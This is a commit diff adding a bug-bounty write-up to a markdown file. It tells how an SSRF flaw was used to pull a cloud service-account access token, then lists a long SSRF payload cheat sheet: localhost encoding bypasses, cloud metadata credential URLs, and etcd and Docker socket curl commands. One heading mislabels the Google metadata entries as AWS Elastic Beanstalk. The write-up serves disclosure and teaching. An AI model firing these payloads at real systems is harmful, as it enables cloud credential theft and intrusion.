Update writeups.md

This commit is contained in:
Mehdi 2024-08-24 10:21:23 +03:30 committed by GitHub
parent 9e7ebce5a5
commit 969642b392
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -109,6 +109,136 @@ Token=28907420839252952&OrderId=51489803&TerminalNo=8521900539207&RRN=7438075480
![open-redirect](https://github.com/user-attachments/assets/8b4b6362-0b5d-4036-beea-51eff948f627) ![open-redirect](https://github.com/user-attachments/assets/8b4b6362-0b5d-4036-beea-51eff948f627)
## SSRF to leaking access token and other sensitive information
1. Use `cat waybackurl | gf ssrf`
2. I tried testing ssrf, So I quickly opened my Burpsuite and put the burp collaborator link in the `__host` field and send the request, I clicked on poll now button and yes I got an HTTP interaction and the burp collaborator response was reflected on the screen
![ssrf-1](https://github.com/user-attachments/assets/14397651-6b2e-406c-8566-50137f416c0d)
3. I tried **XSS** with it by firing up an Apache server and uploading alert JavaScript payload / But i stopped because XSS wont be so impactful and started to look for **ssrf**, In the `__host` parameter I put `169.254.169.254` and in the url I added `/latest/meta-data/iam/security-credentials/`
```html
https://redacted.redacted.com/latest/meta-data/iam/security-credentials/?__host=169.254.169.254&__proto=https
```
4. Sent the request. But it returned **502 BAD Gateway** I then changed `__proto` value to http but it didnt either worked
5. Then I though of why not try other endpoints like google, digital ocean ones
![ssrf-2](https://github.com/user-attachments/assets/cf53ed8a-b5a0-47fd-a93d-ce800bd8c38b)
6. So I quickly added this header and set the value of it to Google and send the request and yesss!! it did work
7. I then tried to get access token using
```html
GET /computeMetadata/v1/instance/service-accounts/default/token?__host=169.254.169.254&__proto=http
```
8. I screamed woah!! I got it, SSRF achieved
![ssrf-final](https://github.com/user-attachments/assets/6c546428-667a-41ec-9df7-e8f34acf84fa)
```text
# The payloads that are used by hackers to detect SSRF on a web application are given below:
# Basic SSRF
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
http://localhost:80
http://localhost:443
http://localhost:22
# SSRF using Various Encoding
1. Hex Encoding like using :
127.0.0.1 to 0x7f.0x0.0x0.0x1
localhost to 6C6F63616C686F7374
2. Octal Encoding like using :
127.0.0.1 translates to 0177.0.0.01
3. Dword Encoding is "Double Word" or 32-bit integer
http://127.0.0.1 to http://2130706433
4. URL Encoding :
http://localhost to http://%6c%6f%63%61%6c%68%6f%73%74
# SSRF To XSS
1. http://brutelogic.com.br/poc.svg -> simple alert
# Bypass localhost with [::]
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
# Alternate IP encoding
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
# SSRF URL for AWS Elastic Beanstalk
Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
Google allows recursive pulls
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
# SSRF URL for Digital Ocean
Documentation available at https://developers.digitalocean.com/documentation/metadata/
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
# SSRF URL for Azure
Limited, maybe more exists?
https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
http://169.254.169.254/metadata/v1/maintenance
Update Apr 2017, Azure has more support; requires the header “Metadata: true”
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=20
17-04-02&format=text
# SSRF URL for Kubernetes ETCD
Can contain API keys and internal ip and ports
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
# SSRF URL for Docker
http://127.0.0.1:2375/v1.24/containers/json
Simple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```